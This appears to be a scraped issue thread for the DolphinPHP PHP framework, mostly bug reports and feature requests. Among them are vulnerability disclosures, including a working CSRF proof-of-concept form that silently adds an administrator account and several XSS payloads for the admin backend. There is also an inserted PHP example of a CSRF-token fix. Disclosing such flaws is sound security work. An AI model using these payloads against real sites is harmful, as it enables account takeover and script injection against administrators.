caiweiming / dolphinphp
DolphinPHP: a rapid development framework based on ThinkPHP 5.1.41 LTS
Home Page: http://www.dolphinphp.com
License: Other
The Add User form has no CSRF token.
An attacker can use it to add a new user.
Trick an administrator into opening this page:
<html>
  <body>
    <form action="http://192.168.52.130/public/admin.php/user/index/add.html" method="POST" id="test">
      <input type="hidden" name="username" value="hackertest" />
      <input type="hidden" name="nickname" value="hackertest" />
      <input type="hidden" name="role" value="1" />
      <input type="hidden" name="email" value="qq@aixinwei.wang" />
      <input type="hidden" name="password" value="testtest" />
      <input type="hidden" name="mobile" value="13311111111" />
      <input type="hidden" name="avatar" value="" />
      <input type="hidden" name="status" value="1" />
    </form>
    <script>
      var f = document.getElementById("test");
      f.submit();
    </script>
  </body>
</html>
Suggested fix: add a CSRF token to the HTML form.
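The synchronizer-token fix the report suggests, as an added example (not DolphinPHP's or ThinkPHP's own code): the server issues a random per-session token when it renders the add-user form and refuses any POST that does not carry it. The field name `__token__`, the session key, the function names and the array-based stand-in for `$_SESSION` are this example's own assumptions.

```php
<?php
// Added example, not DolphinPHP code: a per-session synchronizer token for the
// add-user form. A cross-site page like the PoC above cannot read the victim's
// token, so its auto-submitted POST is rejected before any user is created.
declare(strict_types=1);

const CSRF_FIELD = '__token__';          // hidden form field name (assumed)
const CSRF_SESSION_KEY = '_csrf_token';  // session slot for the token (assumed)

/** Return the session's CSRF token, generating it on first use. */
function csrf_token(array &$session): string
{
    if (empty($session[CSRF_SESSION_KEY])) {
        // 32 random bytes from the CSPRNG, hex-encoded for safe transport.
        $session[CSRF_SESSION_KEY] = bin2hex(random_bytes(32));
    }
    return $session[CSRF_SESSION_KEY];
}

/** Hidden input to embed in the add-user form when it is rendered. */
function csrf_field(array &$session): string
{
    $token = htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8');
    return '<input type="hidden" name="' . CSRF_FIELD . '" value="' . $token . '" />';
}

/**
 * Verify a submitted form. True only when the POST carries exactly the token
 * stored in the session; hash_equals() compares in constant time.
 */
function csrf_verify(array $session, array $post): bool
{
    $expected = $session[CSRF_SESSION_KEY] ?? '';
    $given    = $post[CSRF_FIELD] ?? '';
    if ($expected === '' || !is_string($given)) {
        return false;
    }
    return hash_equals($expected, $given);
}

// Constructed session and request bodies (stand-ins for $_SESSION and $_POST).
$session = [];
$token   = csrf_token($session);

// 1. Forged request: the fields the PoC page above submits, with no token.
$forged = ['username' => 'hackertest', 'password' => 'testtest', 'role' => '1'];
echo 'forged POST:   ', csrf_verify($session, $forged) ? 'accepted' : 'rejected', "\n";

// 2. Legitimate submission from a form that included csrf_field().
$legit = $forged + [CSRF_FIELD => $token];
echo 'legit POST:    ', csrf_verify($session, $legit) ? 'accepted' : 'rejected', "\n";

// 3. Attacker guessing a token value: still rejected.
$guess = $forged + [CSRF_FIELD => str_repeat('0', 64)];
echo 'guessed token: ', csrf_verify($session, $guess) ? 'accepted' : 'rejected', "\n";
```

Only the second submission passes `csrf_verify()`; the forged one fails because the field is absent, the guessed one because the value does not match. Marking the session cookie `SameSite=Lax` is a useful complement, but the token check is what makes the fix independent of browser cookie policy.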
Keep it up!!!
As in the title: in auto-add mode, none of the modifiers I set take effect. Please fix.
That would be a better experience and would avoid refreshing the whole page in real time.
Does the official team plan to upgrade to ThinkPHP 6.0? Has a timeline been set?
File /application/user/admin/Index.php
Line 532: $this->request->post(['ids'=> $user_list]);
Error: Array to string conversion
TP5.1 no longer supports passing an array to modify request values.
ZBuilder is quite good; consider open-sourcing it separately so more people can improve it.
version: 1.5.1
Vulnerability location: Backend -> System -> System functions -> Configuration management.
Add a new configuration and insert the payload in the configuration title.
payload: t"><img src=x onerror=alert(1)>
Save and refresh the page. A pop-up window appears.
payload: <img src=x onerror=alert("xss")>
When you visit this page, a pop-up window appears.
Good work will find its supporters; don't let others distract you.
Address: https://www.kancloud.cn/ming5112/dolphinphp/619103
I downloaded the latest version, set fixedLeft, added multiple columns and used the horizontal scroll bar, but the left column is not fixed.
1. Have I misunderstood what it is for?
2. Is my usage wrong?
3. Are there caveats to using it?
4. Could you write a complete demo that shows the effect?
Hello, a question about building a table with ZBuilder: when searching for a keyword while the current page is not page 1, no results are found.
Example:
Build the current table with ZBuilder, page to page 6 (anything beyond page 1 will do), then search for any keyword: nothing is found. If page=xxx in the URL is changed to page=1, the search works.
This is a small bug, I suppose: when a search is performed, the current page must be reset to 1 to get results. How should this be handled???
application/admin/controller/Admin.php line 155
For example, in a multi-level product category list, after adding several levels, all entries appear in the list but the hierarchy is not visible.
public function setIpAttr()
{
    return request()->ip();
}

return ZBuilder::make('table')
    ->addColumns([
        ['ip', 'IP address', 'callback', function ($value) {
            // $value receives no value here
            return 456;
        }],
    ])
    ->fetch();
Very high quality! A conscientious piece of work.
I'm using the valet development environment, and entering the backend just keeps 302-redirecting; speechless...
DolphinPHP/application/cms/admin/Document.php
Line 223 in 77dd8ee
There is only one version right now.
Sometimes toggling show/hide does not require clearing the hidden form values.
/**
 * Set a trigger
 * @param string $trigger  Name of the form item that triggers; currently supports select (single choice), text and radio
 * @param string $values   Value that triggers
 * @param string $show     Name of the form item to show when triggered; currently does not support ordinary linkage, range, drag sort or static text
 * @param bool   $is_clear Whether to clear the values of the hidden form items; cleared by default
 * @author 蔡伟明
 * @return $this
 */
public function setTrigger($trigger = '', $values = '', $show = '', $is_clear = true)
A created view is also shown in the list.
But the backup logic should only target tables; if a view is selected for backup, it fails.
/application/admin/controller/Admin.php
In the add method, password-type fields are saved without hashing; suggest adding it:
foreach ($form['items'] as $item) {
    // $item[0] is the field type, $item[1] the field name
    if ($item[0] == 'password') {
        $data[$item[1]] = Hash::make((string) $data[$item[1]]);
    }
}
In the behaviors, config is executed by default at app_begin, which makes dynamically set config ineffective.
The scenario is this: if I enable watermarks in the backend but some uploads don't need a watermark, I can dynamically disable upload_thumb_water, but once the behavior runs, every time attachment is reached the configuration is re-read, so config('upload_thumb_water', 0) has no effect.
When thumbnails are enabled and the uploaded image is large (tested with 894K and 2.1M images), the upload fails; 100% reproducible.
version: 1.5.1
Vulnerability location: Backend -> System -> System functions -> Attachment management.
Backend -> System -> System functions -> System log.
Backend -> System -> System functions -> Behavior management.
Affected parameter: search_field
payload: test"><img src=x onerror=alert("xss")>